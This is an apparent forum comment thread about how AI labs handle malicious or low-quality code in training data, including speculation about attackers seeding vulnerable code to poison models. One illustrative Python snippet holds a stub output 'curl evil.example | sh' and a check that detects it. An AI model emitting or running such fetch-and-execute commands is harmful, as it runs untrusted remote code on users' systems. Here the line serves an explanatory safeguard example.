Everyone’s approach (well, except Anthropic’s; they seem to have preserved a bit of taste) is “the more data the better,” so the databases of stolen content (erm, models) end up memorizing crap.
reply
This was a compromise of the library owners’ GitHub accounts, apparently, so it’s not really the same scenario as dangerous code in the training data.

I assume most labs don't do anything specific to deal with this and just hope it gets trained out, since better code should be better rewarded in theory?
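
If so, the mechanism would be quality-weighted sampling at curation time. A toy sketch of the idea (the corpus, the scores, and where they come from are all invented here, not any lab's actual pipeline):

    import random

    # Hypothetical docs: each carries a quality score from some upstream
    # signal (a linter pass, test results, a learned code-quality model...).
    corpus = [
        {"text": "def add(a, b):\n    return a + b", "quality": 0.9},
        {"text": "eval(input())  # yolo", "quality": 0.1},
    ]

    def sample_batch(corpus, k):
        """Higher-quality code is proportionally more likely to be sampled,
        so it is 'better rewarded' in the sense above."""
        weights = [doc["quality"] for doc in corpus]
        return random.choices(corpus, weights=weights, k=k)

    batch = sample_batch(corpus, k=8)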

reply
By betting that it dilutes away and not worrying about it too much. Bit like dropping radioactive barrels into the deep ocean.
reply
Yeah, and that won't hold up for long. Just wait until some well resourced attacker replicates their exploit into tens of thousands of sources it knows will be scraped and included in the training set to bias the model to produce their vulnerable code. Only a matter of time.
reply
I am pretty sure that such measures aren't taken by AI companies, though I may be wrong.
reply
The API/online model inference definitely runs through some kind of edge safeguard model, which could do this.
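
Something shaped like this, presumably; every class and threshold below is a stand-in, since no provider documents their safeguard stack:

    class CodeLLM:
        def generate(self, prompt: str) -> str:
            # Stand-in for the real model; returns a worst-case completion.
            return "import os; os.system('curl evil.example | sh')"

    class SafetyModel:
        def classify(self, text: str) -> float:
            # A real safeguard would be a learned classifier; this stub just
            # pattern-matches one obviously hostile shell pipe.
            return 0.99 if "curl" in text and "| sh" in text else 0.01

    def guarded_completion(llm, guard, prompt, threshold=0.5):
        """Run inference, then gate the output on a separate safeguard model."""
        completion = llm.generate(prompt)
        if guard.classify(completion) > threshold:
            return "[completion withheld by safeguard]"
        return completion

    print(guarded_completion(CodeLLM(), SafetyModel(), "write a downloader"))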
reply